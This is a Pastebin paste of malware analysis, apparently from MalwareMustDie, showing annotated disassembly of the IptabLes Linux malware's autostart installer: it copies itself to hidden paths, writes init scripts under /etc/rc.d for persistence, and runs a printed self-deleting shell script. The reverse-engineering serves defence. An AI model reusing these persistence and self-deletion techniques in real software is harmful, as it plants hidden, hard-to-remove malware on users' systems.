Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;; Installation of the Autostart Scripts reversed | #MalwareMustDie - @unixfreaxjp /malware/Iptablex]$ date
- ;; Mon Jun 16 14:09:52 JST 2014
- // Installation of autostarts...
- .text:0804CED0 public initsrv
- .text:0804CED0 initsrv proc near
- .text:0804CED0
- .text:0804CED0 var_228 = dword ptr -228h
- .text:0804CED0 var_224 = dword ptr -224h
- .text:0804CED0 var_220 = dword ptr -220h
- .text:0804CED0 var_21C = dword ptr -21Ch
- .text:0804CED0 var_20C = dword ptr -20Ch
- .text:0804CED0 var_10C = dword ptr -10Ch
- .text:0804CED0 var_108 = dword ptr -108h
- .text:0804CED0 var_104 = dword ptr -104h
- .text:0804CED0 var_100 = dword ptr -100h
- .text:0804CED0 var_FC = dword ptr -0FCh
- .text:0804CED0 var_F8 = dword ptr -0F8h
- .text:0804CED0 var_F4 = word ptr -0F4h
- .text:0804CED0
- .text:0804CED0 push ebp
- .text:0804CED1 mov ebp, esp
- .text:0804CED3 push edi
- .text:0804CED4 push esi
- .text:0804CED5 push ebx
- .text:0804CED6 sub esp, 21Ch ; pathname
- .text:0804CEDC lea esi, [ebp+var_10C]
- .text:0804CEE2 lea edi, [ebp+var_20C]
- .text:0804CEE8 mov [esp+228h+var_220], 100h
- .text:0804CEF0 mov [esp+228h+var_224], 0
- .text:0804CEF8 mov [esp+228h+var_228], esi
- .text:0804CEFB call memset
- .text:0804CF00 mov [esp+228h+var_220], 100h
- .text:0804CF08 mov [esp+228h+var_224], 0
- .text:0804CF10 mov [esp+228h+var_228], edi
- .text:0804CF13 call memset
- .text:0804CF18 mov dword ptr ds:g_mainsrvinfo+1DCh, offset xmfilea ; offset contains "/boot/.IptabLes"
- .text:0804CF22 mov [esp+228h+var_220], offset aDelallmykkk ; <=-contains "/delallmykkk"
- .text:0804CF2A mov [esp+228h+var_224], 4FCh
- .text:0804CF32 mov [esp+228h+var_228], offset delallfile
- .text:0804CF39 call WriteToFile
- .text:0804CF3E sub eax, 1
- .text:0804CF41 jz loc_804D37D
- .text:0804CF47
- .text:0804CF47 loc_804CF47:
- .text:0804CF47 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804CF4C mov [esp+228h+var_220], 81333C4h
- .text:0804CF54 mov [esp+228h+var_224], offset aCpSSDevNull ; DB contains "cp %s %s>/dev/null"
- .text:0804CF5C mov [esp+228h+var_228], esi
- .text:0804CF5F mov [esp+228h+var_21C], eax
- .text:0804CF63 call sprintf
- .text:0804CF68 mov [esp+228h+var_228], esi
- .text:0804CF6B call system
- .text:0804CF70 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804CF75 mov [esp+228h+var_228], eax
- .text:0804CF78 call Get_File_Size
- .text:0804CF7D mov [esp+228h+var_228], 81333C4h
- .text:0804CF84 mov ebx, eax
- .text:0804CF86 call Get_File_Size
- .text:0804CF8B cmp ebx, eax
- .text:0804CF8D jz loc_804D2C0
- .text:0804CF93 mov dword ptr ds:g_mainsrvinfo+1DCh, offset xmfileb ; <--"/usr/.IptabLes"
- .text:0804CF9D mov [esp+228h+var_220], 100h
- .text:0804CFA5 mov [esp+228h+var_224], 0
- .text:0804CFAD mov [esp+228h+var_228], esi
- .text:0804CFB0 call memset
- .text:0804CFB5 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804CFBA mov [esp+228h+var_220], 81333C4h
- .text:0804CFC2 mov [esp+228h+var_224], offset aCpSSDevNull ; <--"cp %s %s>/dev/null"
- .text:0804CFCA mov [esp+228h+var_228], esi
- .text:0804CFCD mov [esp+228h+var_21C], eax
- .text:0804CFD1 call sprintf
- .text:0804CFD6 mov [esp+228h+var_228], esi
- .text:0804CFD9 call system
- .text:0804CFDE mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804CFE3 mov [esp+228h+var_228], eax
- .text:0804CFE6 call Get_File_Size
- .text:0804CFEB mov [esp+228h+var_228], 81333C4h
- .text:0804CFF2 mov ebx, eax
- .text:0804CFF4 call Get_File_Size
- .text:0804CFF9 cmp ebx, eax
- .text:0804CFFB jz loc_804D325
- .text:0804D001 mov dword ptr ds:g_mainsrvinfo+1DCh, offset xmfilec ; <--- "/.IptabLes"
- .text:0804D00B mov [esp+228h+var_220], 100h
- .text:0804D013 mov [esp+228h+var_224], 0
- .text:0804D01B mov [esp+228h+var_228], esi
- .text:0804D01E call memset
- .text:0804D023 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D028 mov [esp+228h+var_220], 81333C4h
- .text:0804D030 mov [esp+228h+var_224], offset aCpSSDevNull ; <---"cp %s %s>/dev/null"
- .text:0804D038 mov [esp+228h+var_228], esi
- .text:0804D03B mov [esp+228h+var_21C], eax
- .text:0804D03F call sprintf
- .text:0804D044 mov [esp+228h+var_228], esi
- .text:0804D047 call system
- .text:0804D04C mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D051 mov [esp+228h+var_224], offset xmfilea ; <---"/boot/.IptabLes"
- .text:0804D059 mov [esp+228h+var_228], eax
- .text:0804D05C call CreatPeLink
- .text:0804D061 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D066 mov [esp+228h+var_224], offset xmfileb ; <---"/usr/.IptabLes"
- .text:0804D06E mov [esp+228h+var_228], eax
- .text:0804D071 call CreatPeLink
- .text:0804D076
- .text:0804D076 loc_804D076:
- .text:0804D076 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D07B mov [esp+228h+var_224], 309h
- .text:0804D083 mov [esp+228h+var_228], eax
- .text:0804D086 call chmod
- .text:0804D08B mov [esp+228h+var_220], 100h
- .text:0804D093 mov [esp+228h+var_224], 0
- .text:0804D09B mov [esp+228h+var_228], esi
- .text:0804D09E call memset
- .text:0804D0A3 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D0A8 mov [esp+228h+var_224], offset srvfile ; <--- "#!/bin/sh\n%s\nexit 0\n"
- .text:0804D0B0 mov [esp+228h+var_228], edi
- .text:0804D0B3 mov [esp+228h+var_220], eax
- .text:0804D0B7 call sprintf
- .text:0804D0BC mov ecx, edi
- .text:0804D0BE
- .text:0804D0BE loc_804D0BE: : cross reff initserv()
- .text:0804D0BE mov eax, [ecx]
- .text:0804D0C0 add ecx, 4
- .text:0804D0C3 lea edx, [eax-1010101h]
- .text:0804D0C9 not eax
- .text:0804D0CB and edx, eax
- .text:0804D0CD and edx, 80808080h
- .text:0804D0D3 jz short loc_804D0BE
- .text:0804D0D5 test edx, 8080h
- .text:0804D0DB jnz short loc_804D0E3
- .text:0804D0DD shr edx, 10h
- .text:0804D0E0 add ecx, 2
- .text:0804D0E3
- .text:0804D0E3 loc_804D0E3: : cross reff initserv()
- .text:0804D0E3 add dl, dl
- .text:0804D0E5 sbb ecx, 3
- .text:0804D0E8 sub ecx, edi
- .text:0804D0EA mov [esp+228h+var_224], ecx
- .text:0804D0EE mov [esp+228h+var_220], offset aEtcRc_dInit_dI ; <---"/etc/rc.d/init.d/IptabLes"
- .text:0804D0F6 mov [esp+228h+var_228], edi
- .text:0804D0F9 call WriteToFile
- .text:0804D0FE mov ecx, edi
- .text:0804D100 sub eax, 1
- .text:0804D103 jz loc_804D250
- .text:0804D109
- .text:0804D109 loc_804D109: : cross reff initserv()
- .text:0804D109 mov eax, [ecx]
- .text:0804D10B add ecx, 4
- .text:0804D10E lea edx, [eax-1010101h]
- .text:0804D114 not eax
- .text:0804D116 and edx, eax
- .text:0804D118 and edx, 80808080h
- .text:0804D11E jz short loc_804D109
- .text:0804D120 test edx, 8080h
- .text:0804D126 jz loc_804D230
- .text:0804D12C
- .text:0804D12C loc_804D12C: : cross reff initserv()
- .text:0804D12C add dl, dl
- .text:0804D12E sbb ecx, 3
- .text:0804D131 sub ecx, edi
- .text:0804D133 mov [esp+228h+var_224], ecx
- .text:0804D137 mov [esp+228h+var_220], offset aEtcRc_dIptable ; <---"/etc/rc.d/IptabLes"
- .text:0804D13F mov [esp+228h+var_228], edi
- .text:0804D142 call WriteToFile
- .text:0804D147 mov ecx, edi
- .text:0804D149 sub eax, 1
- .text:0804D14C jz loc_804D2E0
- .text:0804D152
- .text:0804D152 loc_804D152: : cross reff initserv()
- .text:0804D152 mov eax, [ecx]
- .text:0804D154 add ecx, 4
- .text:0804D157 lea edx, [eax-1010101h]
- .text:0804D15D not eax
- .text:0804D15F and edx, eax
- .text:0804D161 and edx, 80808080h
- .text:0804D167 jz short loc_804D152
- .text:0804D169 test edx, 8080h
- .text:0804D16F jz loc_804D240
- .text:0804D175
- .text:0804D175 loc_804D175: : cross reff initserv()
- .text:0804D175 add dl, dl
- .text:0804D177 sbb ecx, 3
- .text:0804D17A sub ecx, edi
- .text:0804D17C mov [esp+228h+var_224], ecx
- .text:0804D180 mov [esp+228h+var_220], offset aBootIptables ; <---"/boot/IptabLes"
- .text:0804D188 mov [esp+228h+var_228], edi
- .text:0804D18B call WriteToFile
- .text:0804D190 mov ecx, edi
- .text:0804D192 sub eax, 1
- .text:0804D195 jz loc_804D34A
- .text:0804D19B
- .text:0804D19B loc_804D19B: : cross reff initserv()
- .text:0804D19B mov eax, [ecx]
- .text:0804D19D add ecx, 4
- .text:0804D1A0 lea edx, [eax-1010101h]
- .text:0804D1A6 not eax
- .text:0804D1A8 and edx, eax
- .text:0804D1AA and edx, 80808080h
- .text:0804D1B0 jz short loc_804D19B
- .text:0804D1B2 test edx, 8080h
- .text:0804D1B8 jz loc_804D33F
- .text:0804D1BE
- .text:0804D1BE loc_804D1BE: : cross reff initserv()
- .text:0804D1BE add dl, dl
- .text:0804D1C0 sbb ecx, 3
- .text:0804D1C3 sub ecx, edi
- .text:0804D1C5 mov [esp+228h+var_220], 80B38BBh
- .text:0804D1CD mov [esp+228h+var_224], ecx
- .text:0804D1D1 mov [esp+228h+var_228], edi
- .text:0804D1D4 call WriteToFile
- .text:0804D1D9 mov [ebp+var_10C], 7470492Fh
- .text:0804D1E3 mov [ebp+var_108], 654C6261h
- .text:0804D1ED mov word ptr [ebp+var_104], 73h
- .text:0804D1F6
- .text:0804D1F6 loc_804D1F6: : cross reff initserv()
- .text:0804D1F6 mov [esp+228h+var_224], offset aEtcRc_dInit_dI ; <--"/etc/rc.d/init.d/IptabLes"
- .text:0804D1FE mov [esp+228h+var_228], esi
- .text:0804D201 call CreatPeLink
- .text:0804D206 mov [esp+228h+var_224], offset aEtcRc_dIptable ; <--"/etc/rc.d/IptabLes"
- .text:0804D20E mov [esp+228h+var_228], esi
- .text:0804D211 call CreatPeLink
- .text:0804D216
- .text:0804D216 loc_804D216: : cross reff initserv()
- .text:0804D216 mov [esp+228h+var_228], esi
- .text:0804D219 call startallfile
- .text:0804D21E call rundelmecmd
- .text:0804D223 add esp, 21Ch
- .text:0804D229 xor eax, eax
- .text:0804D22B pop ebx
- .text:0804D22C pop esi
- .text:0804D22D pop edi
- .text:0804D22E pop ebp
- .text:0804D22F retn
- [...]
- .text:0804D250 loc_804D250: : cross reff initserv()
- .text:0804D250 mov [ebp+var_10C], 6374652Fh
- .text:0804D25A mov [ebp+var_108], 2E63722Fh
- .text:0804D264 mov [ebp+var_104], 6E692F64h
- .text:0804D26E mov [ebp+var_100], 642E7469h
- .text:0804D278 mov [ebp+var_FC], 7470492Fh
- .text:0804D282 mov [ebp+var_F8], 654C6261h
- .text:0804D28C mov [ebp+var_F4], 73h
- .text:0804D295 mov [esp+228h+var_224], offset aEtcRc_dIptable ; <---"/etc/rc.d/IptabLes"
- .text:0804D29D
- .text:0804D29D loc_804D29D: : cross reff initserv()
- .text:0804D29D mov [esp+228h+var_228], esi
- .text:0804D2A0 call CreatPeLink
- .text:0804D2A5 mov [esp+228h+var_224], offset aBootIptables ; <---"/boot/IptabLes"
- .text:0804D2AD mov [esp+228h+var_228], esi
- .text:0804D2B0 call CreatPeLink
- .text:0804D2B5 jmp loc_804D216
- .text:0804D2C0
- .text:0804D2C0 loc_804D2C0: : cross reff initserv()
- .text:0804D2C0 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D2C5 mov [esp+228h+var_224], offset xmfileb ; <---"/usr/.IptabLes"
- .text:0804D2CD mov [esp+228h+var_228], eax
- .text:0804D2D0 call CreatPeLink
- .text:0804D2D5 jmp loc_804D076
- .text:0804D2DA align 10h
- .text:0804D2E0
- .text:0804D2E0 loc_804D2E0: : cross reff initserv()
- .text:0804D2E0 mov [ebp+var_10C], 6374652Fh
- .text:0804D2EA mov [ebp+var_108], 2E63722Fh
- .text:0804D2F4 mov [ebp+var_104], 70492F64h
- .text:0804D2FE mov [ebp+var_100], 4C626174h
- .text:0804D308 mov word ptr [ebp+var_FC], 7365h
- .text:0804D311 mov byte ptr [ebp+var_FC+2], 0
- .text:0804D318 mov [esp+228h+var_224], offset aEtcRc_dInit_dI ; <--"/etc/rc.d/init.d/IptabLes"
- .text:0804D320 jmp loc_804D29D
- .text:0804D325 loc_804D325: : cross reff initserv()
- .text:0804D325 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D32A mov [esp+228h+var_224], offset xmfilea ; <--"/boot/.IptabLes"
- .text:0804D332 mov [esp+228h+var_228], eax
- .text:0804D335 call CreatPeLink
- .text:0804D33A jmp loc_804D076
- .text:0804D33F
- .text:0804D33F loc_804D33F: : cross reff initserv()
- .text:0804D33F shr edx, 10h
- .text:0804D342 add ecx, 2
- .text:0804D345 jmp loc_804D1BE
- .text:0804D34A
- .text:0804D34A loc_804D34A: : cross reff initserv()
- .text:0804D34A mov [ebp+var_10C], 6F6F622Fh
- .text:0804D354 mov [ebp+var_108], 70492F74h
- .text:0804D35E mov [ebp+var_104], 4C626174h
- .text:0804D368 mov word ptr [ebp+var_100], 7365h
- .text:0804D371 mov byte ptr [ebp+var_100+2], 0
- .text:0804D378 jmp loc_804D1F6
- .text:0804D37D loc_804D37D: : cross reff initserv()
- .text:0804D37D mov [esp+228h+var_228], offset aDelallmykkkDev ; <---"/delallmykkk>/dev/null"
- .text:0804D384 call system
- .text:0804D389 jmp loc_804CF47
- .text:0804D389 initsrv endp
- ;; this delmecmd used for self deletion called in the above function..
- .rodata:080B3E40 delmecmd db '#!/bin/bash',0Ah
- .rodata:080B3E40 db 'sleep 3',0Ah
- .rodata:080B3E40 db 'kill %d',0Ah
- .rodata:080B3E40 db 'sleep 1',0Ah
- .rodata:080B3E40 db 'rm -f %s',0Ah
- .rodata:080B3E40 db 'rm -rf "$0"',0Ah,0
- .rodata:080B3E7A public rundelme
- .rodata:080B3E7A rundelme db 73h, 68h, 20h, 2Fh, 64h, 65h, 6Ch, 2 dup(78h), 2 dup(61h)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement